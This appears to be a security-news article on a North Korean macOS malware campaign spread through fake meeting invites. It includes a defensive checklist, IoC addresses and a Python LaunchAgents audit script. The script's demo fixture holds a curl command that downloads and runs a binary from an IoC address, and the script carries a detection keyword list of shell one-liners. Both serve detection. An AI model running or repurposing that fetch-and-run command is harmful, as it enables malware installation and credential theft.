North Korea's Lazarus Group has deployed a new macOS malware kit called Mach-O Man, targeting crypto and fintech executives through fake Zoom meeting invitations on Telegram. The same unit is attributed to stealing $285 million from Drift Protocol on April 1 and $292 million from KelpDAO on April 18 — over $575 million stolen in just 18 days, with Mach-O Man now emerging as the third attack vector.
How Does Mach-O Man Work?
TL;DR: Mach-O Man is a macOS malware kit by Lazarus Group that tricks victims into running a Terminal command during a fake Zoom call, harvesting credentials, Keychain data, and browser sessions before self-deleting.
The campaign was identified on April 21, 2026, by the Quetzal security team at Bitso, in collaboration with the threat analysis platform ANY.RUN. The malware is built on native Mach-O binaries — Apple's own executable format — making it invisible to most traditional security tools.
The attack chain unfolds in four stages:
- Lure: An urgent meeting invite arrives via Telegram, often from a compromised account, for a call on Zoom, Teams, or Google Meet
- ClickFix: The fake page displays a connection error and prompts the victim to paste a command into the macOS Terminal to "fix the issue"
- Stager: The command executes teamsSDK.bin, which downloads a fake application bundle with an ad-hoc signature designed to bypass Gatekeeper
- Exfiltration: The malware harvests credentials, Keychain data, and browser sessions across Chrome, Safari, Firefox, Brave, and Opera — then self-deletes

Mach-O Man's Connection to the Drift and KelpDAO Hacks
CertiK confirmed a direct link between Mach-O Man and both April mega-exploits. The playbook is identical: social engineering as the entry point, not technical vulnerabilities in smart contracts. On Drift, the multisig governance was manipulated via social engineering. On KelpDAO, the RPC infrastructure was compromised from the inside.
Natalie Newson, senior blockchain security researcher at CertiK, was direct:
"This is not random hacking. This is a state-directed financial operation running at the speed and scale of an institution."
The responsible unit — Famous Chollima, the operational division of Lazarus Group — has now been attributed with 18 attacks in 2026 alone, according to Elliptic. Since 2017, the total amount stolen reaches approximately $6.7 billion. The United Nations has confirmed these funds directly finance Kim Jong Un's weapons program.
Lazarus Group Just Released "Mach-O Man" – A Brand-New Native macOS Malware Kit Targeting Fintech, Crypto, and High-Value Executives
You get an "urgent" meeting invite over Telegram for a Zoom, Teams, or Google Meet call. The link leads to a convincing fake website that tells…
— Vladimir S. | Officer's Notes (@officer_secret) April 21, 2026
How to Protect Yourself: Operational Checklist for macOS Crypto Users
For anyone working in crypto, fintech, or Web3 on a Mac, here are the countermeasures recommended by researchers at Bitso and CertiK:
- Never run Terminal commands prompted by a webpage or a chat link
- Verify every meeting invitation through a separate, independent channel (phone call, corporate email)
- Check your LaunchAgents folder (~/Library/LaunchAgents) for suspicious launch agent entries (.plist files) impersonating OneDrive or antivirus software
- Block the indicators of compromise published by the Quetzal Team: IPs 172.86.113.102 and 144.172.114.220
- Use a dedicated hardware wallet, never connected to your daily work machine
- Monitor the SpazioCrypto Hack section for real-time updates
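As an added example (not code from the article, Bitso, CertiK or the Quetzal Team), the following Python audit applies the LaunchAgents and IoC items of the checklist above to a folder of launch agent plists: it flags entries whose label mimics OneDrive or an antivirus product but whose program does not live under /Applications, entries that run from world-writable directories, entries that call a shell or curl one-liner, and entries referencing the two published IoC addresses. The keyword lists, the directory heuristics and the two sample plists are my own constructed assumptions; point `audit_launch_agents` at ~/Library/LaunchAgents to run it on a real Mac.

```python
import os
import plistlib
import tempfile

IOC_IPS = {"172.86.113.102", "144.172.114.220"}   # IPs published by the Quetzal Team
IMPERSONATED = ("onedrive", "antivirus")            # assumed label substrings
SUSPECT_DIRS = ("/tmp", "/var/tmp", "/private/tmp", "/Users/Shared")  # assumed
ONE_LINERS = ("curl ", "bash -c", "sh -c", "osascript -e")  # ClickFix-style stagers

def inspect_plist(path):
    """Return human-readable reasons why this launch agent looks suspicious."""
    with open(path, "rb") as f:
        data = plistlib.load(f)
    label = str(data.get("Label", "")).lower()
    args = data.get("ProgramArguments") or [data.get("Program", "")]
    cmdline = " ".join(str(a) for a in args)
    reasons = []
    # Vendor-looking label whose program is not installed under /Applications
    if any(k in label for k in IMPERSONATED) and not cmdline.startswith("/Applications/"):
        reasons.append(f"label '{data.get('Label')}' impersonates a vendor but runs {args[0]}")
    if any(cmdline.startswith(d) or f" {d}" in cmdline for d in SUSPECT_DIRS):
        reasons.append(f"program path under a world-writable directory: {cmdline}")
    if any(ip in cmdline for ip in IOC_IPS):
        reasons.append("command line references a published IoC address")
    if any(t in cmdline for t in ONE_LINERS):
        reasons.append("agent runs a shell/curl one-liner (ClickFix-style stager)")
    return reasons

def audit_launch_agents(agent_dir):
    """Map each suspicious .plist name in agent_dir to its findings; clean ones are omitted."""
    findings = {}
    for name in sorted(os.listdir(agent_dir)):
        if name.endswith(".plist"):
            reasons = inspect_plist(os.path.join(agent_dir, name))
            if reasons:
                findings[name] = reasons
    return findings

def demo():
    """Constructed sample agents: one genuine-looking OneDrive entry, one mimicking the lure."""
    d = tempfile.mkdtemp()
    good = {"Label": "com.microsoft.OneDrive",
            "ProgramArguments": ["/Applications/OneDrive.app/Contents/MacOS/OneDrive"]}
    bad = {"Label": "com.microsoft.OneDriveUpdater",
           "ProgramArguments": ["/bin/bash", "-c",
                                "curl -s http://172.86.113.102/teamsSDK.bin -o /tmp/.t && /tmp/.t"]}
    for fn, content in (("com.microsoft.OneDrive.plist", good), ("com.onedrive.update.plist", bad)):
        with open(os.path.join(d, fn), "wb") as f:
            plistlib.dump(content, f)
    return audit_launch_agents(d)

if __name__ == "__main__":
    for name, reasons in demo().items():
        print(name, "->", "; ".join(reasons))
```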
What is Mach-O Man malware?
Mach-O Man is a macOS malware kit developed by North Korea's Lazarus Group that uses fake Zoom meeting invitations to trick victims into running a malicious Terminal command, enabling credential theft and browser session hijacking.
How does Mach-O Man bypass macOS Gatekeeper?
Mach-O Man uses an ad-hoc signed application bundle delivered via a fake download, which bypasses Apple's Gatekeeper security mechanism because the signature appears locally valid.
Who are the targets of the Mach-O Man campaign?
The campaign primarily targets crypto founders, CTOs, DeFi contributors, and high-value traders — particularly those using macOS in professional settings.
Is Lazarus Group behind the Drift and KelpDAO hacks?
Yes. CertiK attributed both the $285 million Drift Protocol hack on April 1, 2026, and the $292 million KelpDAO exploit on April 18, 2026, to Lazarus Group's Famous Chollima unit.
The key point is this: Lazarus Group does not need to break your smart contracts. Lazarus Group only needs you to open your Mac Terminal and paste a command that looks harmless. If you are a founder, a CTO, a trader with significant funds, or a DeFi contributor, you are already a target. And as Newson put it — you probably do not know it yet. Review your meeting hygiene today, not after the next $300 million disappears.